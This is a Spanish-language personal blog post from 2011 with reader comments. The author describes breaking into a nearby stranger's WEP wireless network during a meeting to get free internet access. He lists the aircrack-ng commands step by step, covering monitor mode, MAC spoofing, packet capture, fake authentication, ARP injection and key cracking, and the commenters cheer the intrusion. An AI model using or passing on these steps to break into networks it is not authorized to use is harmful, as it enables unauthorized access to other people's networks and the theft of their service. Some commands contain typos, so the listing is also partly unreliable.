viernes, 18 de marzo de 2011

Hacking morning and... fastball

Uff!!, hace tanto que no me daba una vuelta por aca, me da un poco de pena, pero bueno, laboralmente Dios ha dado un giro bien grande desde diciembre 2010 a la fecha, tengo mucho mas responsabilidades y estamos cocinando una verdadera "revolucion" en cuanto a las TIC's en donde trabajo,

pero bueno, eso fue la parte aburrida y la menos importante, hoy voy a postear mi primer hackeo en vivo, en directo, asi que aca estan los detalles:

1. la necesidad es la madre de la invencion: estoy en una reunion super aburrida y debo hacer varias cosas: necesito desarrollar un sistema de informacion para el proximo lunes, voy a usar LAPP asi que bueno tengo menos de 72 horas asi tambien tenia un monton de ganas de enviarle un mail a mi esposa -el amor, el amor- entonces necesito una conexion a internet de manera urgente y no... no, ME NIEGO A TIRAR MI DINERO EN UN modem 3G, absolutely no!!!

2. entonces me dije, en este lugar debe haber por lo menos un router wireless, asi que fui a Wicd y listo, aparecen como 5 routers, listo.... a hackear pues

3. en mi equipo tengo una Broadcomm BCM4312, desde noviembre le instale el BCM43xx pero con tanta onda no habia podido probarlo, hoy es un buen dia.

4. aca van los comandos (perdon por el resumen):
- sudo airmong-ng start wlan1
-sudo ifconfig mon0 down
-sudo macchanger .m 00:11:22:33:44:55 mon0
-sudo ifconfig wlan1 up
-sudo airodump-ng mon0 (aca escogi el BSSID del router que tengo mejor señal, lo llamaremos "charly-brown" porque no queremos aletar al admin de red, quien quita y un dia se de una vuelta por este blog)
-sudo airodump-ng -c 3 -w charly-brown --bssid aa:bb:cc:dd:ee:ff mon0
-sudo aireplay-ng -1 6000 -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
-sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
-sudo aircrack-ng charly-brown-01-cap

5. voila!! la clave fue crackeada como en 3 minutos y listo, la ponemos en el wicd y ya, online

6. perdon por el resumen, de hecho, este procesillo necesita ser detallado, prometo hacer algo mas grafico... en el futuro!

7. aca dejo una imagen con la evidencia, happy coding!!!

3 comentarios:

  1. muy util.... gracias =D

    ResponderEliminar
  2. Uh... nice hack brother! :P

    Now I'm reading the AirePlay attack mode -2, it seems to be interesting :D

    I'm happy to know that you are interested about (in)security topics ;) I hope in narrow future we conform a working team in a wide range of security and programming areas.

    happy hacking!

    God bless us.

    --TuxRacerSV

    ResponderEliminar
  3. By the way, happy birthday, Herbert!!!

    I hope God will gives you a long terms of days in this world.

    Congratz!

    --TuxRacerSV

    ResponderEliminar